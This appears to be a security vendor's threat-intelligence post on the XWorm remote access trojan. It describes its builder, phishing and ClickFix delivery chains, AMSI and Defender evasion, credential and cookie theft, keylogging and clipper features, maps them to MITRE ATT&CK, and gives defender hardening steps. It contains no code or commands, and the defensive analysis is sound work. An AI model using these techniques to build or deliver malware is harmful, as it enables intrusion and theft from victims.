Get a demo

    XWorm RAT analysis: Steal,
 persist & control

     ·  5 minute read

    XWorm is a stealthy remote access tool that often arrives in an ordinary message and can end in full takeover. A single click can give an intruder eyes on a screen, a path to private accounts, and a way to move deeper into a network.

    • First seen at scale around 2022 as a commercial RAT and quickly adopted due to its modular design.

    • In the wild, 78% of XWorm campaigns delivered other malware alongside it, and over 60% of the add-ons were RATs.

    • 5,523 indicators of compromise are linked to XWorm, signaling sustained campaigns.

    • XWorm campaigns were only 58% English, with Spanish and German making up 32% combined, expanding reach beyond typical language patterns.

    Anish Bogati
    Anish Bogati

    Security Research

     
    Akanksha Girii
    Akanksha Girii

    Associate Security Researcher

     
    XWorm RAT analysis

     

    Overview

    XWorm is a “commodity” Remote Access Trojan (RAT) sold and shared in the cyber-crime ecosystem. But it isn’t just another remote-access utility, XWorm is built to shape-shift: one package that can spy, steal, move files, and even plug into larger attacks—whatever the operator needs at that moment.

    XWorm surfaced for sale in mid-2022 on dark-web marketplaces; since then it has grown into a common, MaaS-style RAT with frequent version bumps (v4.x → v5.x → v6.x). XWorm combines ease of use that appeals to inexperienced operators with the flexibility and reliability to craft tailored payloads—making it equally useful to more advanced groups. Cofense have linked XWorm activity to clusters like Nullbulge, UAC-0184, and TA558, showing how it appeals to opportunistic actors and more organized crews alike.

    The real nightmare for cybersecurity teams isn't XWorm's individual capabilities—it's the operational tempo. Recent incidents show just how quickly threat actors can pivot and scale their operations. A single builder campaign compromised 18,459 devices worldwide, demonstrating the malware's ability to achieve massive scale rapidly.

    Threat actors use different routes to deliver XWorm, showing how adaptable the campaigns are. In early 2025, state operators leaned on “ClickFix”, tricking victims into executing malicious commands by presenting them as solutions to technical issues. Kimsuky adopted a ClickFix-style lure that steers targets into launching PowerShell and running attacker code, then used encoded, multi-stage scripts and fileless techniques to fetch and execute XWorm.

    Attackers have also leveraged Cloudflare’s TryCloudflare Tunnels in phishing campaigns targeting thousands of organizations over five-month periods. Their emails and pages led to LNK or VBS files, fetched Python installers, and finally delivered the payload. TA558 used steganography and script-heavy chains, hiding VBS and PowerShell inside images and documents to unpack commodity malware that includes XWorm.

     

    Builder & Variants

    • blog-image-1
    • blog-image-2
     

     

    XWorm Builder is a simple GUI that lets you assemble an XWorm sample without coding. You pick options; it compiles a payload. Fast, repeatable, and the same flow across versions.

     

    What it lets you do?

    With a handful of toggles, you can switch on XWorm's core features (keylogger, clipper, anti-analysis/anti-kill), choose how persistence works (Registry, Scheduled Tasks, Startup), and adjust simple behavior like sleep delay and drop location. Before exporting, you can wrap it with an Obfuscator, set Assembly metadata, or apply a custom Icon —so every build feels “bespoke” even if the recipe is the same.

    For the report we used the Builder to generate samples of v5.6— focusing on one capability at a time (e.g., clipper-only, schtasks-based persistence, anti-analysis on). For every feature, we produced a focused build, executed it, and analyzed artifacts and telemetry.

    We then repeated the same matrix on v6.0. Using equivalent configurations, we did not observe any noticeable feature changes between v5.6 and v6.0—the exposed capabilities, observable TTPs, and resulting telemetry were functionally consistent.

     

    Technical Overview

    Most XWorm stories begin in the inbox: a convincing email or lure page leads you to click an attachment or a link. What lands on disk (or in memory) is a tiny loader, Features Overview:and XWorm keeps changing its costume — LNK/HTA/VBS/WSF, JS, BAT, PowerShell, ZIP/ISO/IMG/VHD, PowerShell, .NET and EXEs, even Office macros as observed by Splunk —so defenders can’t rely on one telltale file type.

    After the click, the chain branches. In many runs, a scripted stager (VBS/WSF/HTA/PS1) reaches out, pulls an encoded payload, and decodes/decrypts it in memory and run evasion (e.g., AMSI bypass via CLR.dll patching), checks for virtual machines, debuggers, emulators, sandbox environments and establishes persistence (Scheduled Task or Startup folder) before dropping or injecting the core client. In other runs, the loader runs directly (for example, a .NET executable or a DLL side-load) and skips PowerShell entirely. The point isn’t one perfect chain; it’s flexibility, so the same lure theme can deliver through whatever path evades that environment’s controls.

    The delivery trick also varies by campaign: Cofense tracked 22 different mechanisms, with batch scripts and LNK downloaders among the most common; plenty of emails used password-protected archives or “legit” files to slip past filters. Some of the more advanced lures push users to a web page that copies a PowerShell command to the clipboard (“ClickFix”) and nudges them to run it—no direct download needed.

     

    MITRE ATT&CK Framework

    Tactic

    Technique

    Technique ID

    Capabilities observed with XWorm

    Initial Access

    Phishing

    XWorm commonly arrives through email phishing with attachments are often PDFs or archives that contain a shortcut or script; opening it runs a small stager that downloads the RAT

    Execution

    User Execution: Malicious File

    User double-clicks shortcut or staged script (.lnk, .bat, .hta) that pulls next stages.

    Command and Scripting Interpreter: PowerShell

    Stagers download, decrypt, and run payloads with execution-policy bypass.

    Persistence

     

    Boot or Logon Autostart Execution: Run Keys / Startup Folder

    Drops a copy of the RAT into the user Startup directory and places a shortcut so it launches at user logon.

    Scheduled Task/Job: Scheduled Task

    Creates a scheduled task to run the binary at logon or on a short recurring interval.

    Defense Evasion

     

    Impair Defenses: Disable or Modify Tools

    Impacts the Defender service, turns protections down—changing Defender preferences so real-time/script/behavior checks are weakened

    Impair Defenses: Disable or Modify System Firewall

    Turns off Windows Firewall for all profiles.

    Obfuscated Files or Information

    Base64/AES-encrypted resources, string obfuscation, and in-memory AMSI patching.

    Virtualization/Sandbox Evasion: System Checks

    Performs checks for VM or sandbox artifacts and alters execution or exits when detected.
     

    Credential Access

    Steal Web Session Cookie

    Collects session material such as Discord, Telegram tokens and browser cookies

    Credentials from Password Stores: Credentials from Web Browsers

    Harvests saved credentials and autofill from Chromium/Firefox profiles

    Discovery

    Application Window Discovery

     

     

    Enumerates open windows and tracks active window titles to guide operator actions and monitoring.

    System Information Discovery

     

    Gathers host profile data including OS version, GPU name, driver version, adapter RAM, and video processor.

    Software Discovery: Security Software Discovery

    Queries the Windows Security Center WMI namespace to gathers information installed and registered antivirus products.

    Collection

     

    Input Capture: Keylogging

    Built-in keylogger capability.

    Screen Capture

    Periodic screenshots as part of RAT surveillance.

    Clipboard Data

    Clipboard monitoring and “clipper” behavior that replaces cryptocurrency addresses.

    Command and Control

    Non-Standard Port




     



     

    C2 over non-standard TCP ports.

    Protocol or Service Impersonation

    Impersonates legitimate protocols or web service traffic

    Lateral Movement

    Remote Services: VNC (HVNC)

    Establishes covert VNC sessions that let the operator control the desktop without a visible UI.

    Impact

    Data Encrypted for Impact

     

    Ransomware-style file encryption module available to operators.

     

    Network DoS: Direct Flood

     

    DDoS commands from infected hosts to exhaust local services or flood remote targets.

    Service Stop

    Stops Windows services to weaken defenses

     

    Defender Guidance & Best Practices

    XWorm is a builder-driven, modular .NET RAT that favors speed over novelty: it’s commonly delivered via WSF/VBS/HTA → PowerShell chains, phones home (often via Telegram), and persists with simple Run keys or scheduled tasks. Its plugin set (keylogging, screen capture, clipboard monitoring, browser/token theft, file ops, remote desktop) makes it useful to low-skill operators while still blending in with admin-looking activity. For defenders and administrators alike, the play is to block the easy paths, harden scripting, and raise visibility where XWorm tries to hide.

    • Keep systems and software up to date.

    • Block risky attachments (ISO/LNK/HTA, macro docs) at the email gateway; also block execution of these file types on endpoints via GPO.

    • Use protective DNS and web filtering; block newly registered/low-reputation domains and restrict downloads from file-sharing/paste sites.

    • Harden PowerShell: disable v2, enable Script Block & Module Logging, and require signed scripts for admins.

    • Restrict LOLBAS: allowlist mshta, wscript/cscript, regsvr32, rundll32 only where needed; alert if they make network connections.

    • Limit egress: use host firewalls to restrict outbound connections from script hosts and PowerShell.
      Alert on persistence artifacts: new scheduled tasks and Run-key entries pointing to %AppData%, %ProgramData%, user profiles, or new startup items.

    • Centralize telemetry in your SIEM and retain at least six months of logs.

    • Enforce MFA for all accounts; at minimum cover admin, VPN, and cloud accounts.
      Separate admin and daily accounts and enforce least privilege.

    • Allowlist applications and RMM tools; block and alert on unapproved installs.
      Isolate high-value systems and restrict RDP/SMB/WMI/WinRM between network segments.



    See full report

    Get a deep technical analysis, detection content, IoCs, variant matrices, and campaign details.